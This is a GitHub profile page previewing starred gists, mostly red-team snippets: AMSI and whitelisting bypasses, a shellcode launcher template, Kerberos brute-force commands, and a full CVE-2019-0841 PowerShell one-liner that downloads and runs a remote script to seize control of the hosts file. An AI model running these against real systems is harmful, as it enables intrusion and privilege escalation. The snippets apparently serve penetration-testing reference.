Skip to content

Instantly share code, notes, and snippets.

View chryzsh's full-sized avatar

crusher chryzsh

528 followers · 7 following
View GitHub Profile
@monoxgas
monoxgas / mscorlib_load_assembly.vba
Last active May 18, 2023 13:30
VBA code for calling AppDomain.Load using raw vtable lookups for the IUnknown
' Need to add project references to C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscoree.tlb and mscorlib.tlb
Private Declare PtrSafe Function DispCallFunc Lib "oleaut32.dll" (ByVal pv As LongPtr, ByVal ov As LongPtr, ByVal cc As Integer, ByVal vr As Integer, ByVal ca As Long, ByRef pr As Integer, ByRef pg As LongPtr, ByRef par As Variant) As Long
Private Declare PtrSafe Sub RtlMoveMemory Lib "kernel32" (Dst As Any, Src As Any, ByVal BLen As LongPtr)
Private Declare PtrSafe Function VarPtrArray Lib "VBE7" Alias "VarPtr" (ByRef Var() As Any) As LongPtr
#If Win64 Then
Const LS As LongPtr = 8&
#Else
Const LS As LongPtr = 4&
@joeminicucci
joeminicucci / gist:7dd5190dc31c43c518abb489ec77903d
Created September 8, 2019 04:12
VBA AMSI Bypasses (from outflanknl)
'##################################################################################
' Code samples for AMSI bypass techniques
' relating to the blogpost on AMSI bypasses on https://outflank.nl/blog/
'##################################################################################
' ##################################################################################
' AMSI Bypass approach that abuses trusted locations (sample for Word)
' ##################################################################################
@ryu1kn
ryu1kn / README.md
Last active October 28, 2025 17:07
Getting GCP access token from a service account key JSON file

Getting GCP access token from a service account key

Use your service account's key JSON file to get an access token to call Google APIs.

Good for seeing how things work, including the creation of JWT token.

To create a JWT token, you can replace create-jwt-token.sh script with tools like step.

If you just want to get an access token for a service account,

@sminez
sminez / get_ippsec_details.py
Last active June 5, 2024 12:10
Find examples of pen testing methods and tools in videos by Ippsec (as of 22nd January 2020)
#!/usr/bin/env python3
"""
Script used to pull down the current video descriptions from ippsec's youtube channel.
The raw output still has a few HTML tags that need to be manually removed and there
also seem to be multiple duplicates of videos that have been removed in the output
saved as ippsec-details.txt
"""
import re
import sys
@0xhexmex
0xhexmex / generic-shellcode-launcher.cs
Last active October 23, 2024 22:27
wmic code execution template
// Template taken from https://github.com/infosecn1nja/MaliciousMacroMSBuild/blob/master/templates/MSBuild_shellcode.csproj
// Compile: C:\windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:c:\test.exe /platform:x86 /unsafe mylauncher.cs
// Or as dll: C:\windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:c:\test.dll /platform:x86 /target:library /unsafe mylauncher.cs
// Then DotNetToJScript.exe -v Auto -l JScript -o mylauncher.js -c ShellCodeLauncher.Program c:\test.dll
// mylauncher.js can be put into something like a WMIC XSL template like so...
/*
// wmic-template.xsl
// wmic os get /format:wmic-template.xsl (if you create x86 shellcode, need to use x86 version of wmic here - c:\windows\syswow64\wbem\wmic.exe)
@bohops
bohops / dotnetcore_msbuild_rosylyn_poc.csproj
Last active June 12, 2020 14:27
<!-- dotnet.exe msbuild rosylyn_poc.csproj -->
<!-- WDAC/AWL Bypass with Dot Net Core (2.2.x) MSBuild (16.x) and the Rosyln Compiler -->
<Project DefaultTargets="Build">
<UsingTask TaskName="HelloWorld" TaskFactory="RoslynCodeTaskFactory" AssemblyFile="$(MSBuildToolsPath)\Microsoft.Build.Tasks.Core.dll">
<Task>
<Code Type="Fragment" Language="cs">
<![CDATA[Console.WriteLine($":-) CSHARP :-)");]]>
</Code>
</Task>
</UsingTask>
@TarlogicSecurity
TarlogicSecurity / kerberos_attacks_cheatsheet.md
Created May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@vysecurity
vysecurity / attack-to-csv.py
Last active April 28, 2022 21:44
Get MITRE ATT&CK Framework Techniques by Group in CSV
from stix2 import FileSystemSource
from stix2 import Filter
from stix2.utils import get_type_from_id
fs = FileSystemSource('./enterprise-attack')
def get_group_by_alias(src):
return src.query([
Filter('type', '=', 'intrusion-set'),
])
@xillwillx
xillwillx / CVE-2019-0841.ps1
Last active June 17, 2020 17:58
CVE-2019-0841 - Overwrite HOST file with "Full Control" permissions given to the user
iex (New-Object net.webclient).downloadstring('https://github.com/FuzzySecurity/PowerShell-Suite/raw/master/Native-HardLink.ps1');start microsoft-edge:;get-process -name MicrosoftEdge | Stop-process;sleep 2;Native-HardLink -Link "$env:localappdata\packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\settings\settings.dat" -target "$env:windir\system32\drivers\etc\hosts";start microsoft-edge:;get-process -name Microsoftedge | stop-process
@CalvinHartwell
CalvinHartwell / ubuntu-18.04-lts-preseed.cfg
Last active December 10, 2021 19:48
ubuntu-18.04-lts-preseed.cfg
### Preseed for Ubuntu 18.04
# Derived from: https://help.ubuntu.com/lts/installation-guide/example-preseed.txt
### Usage
# We recommend to use the build-iso.sh script to build an image with embedded
# preseed and other required files. In that case the preseed file gets loaded
# automatically and all additional files are available to the installer.
### Unattended Installation
d-i auto-install/enable boolean true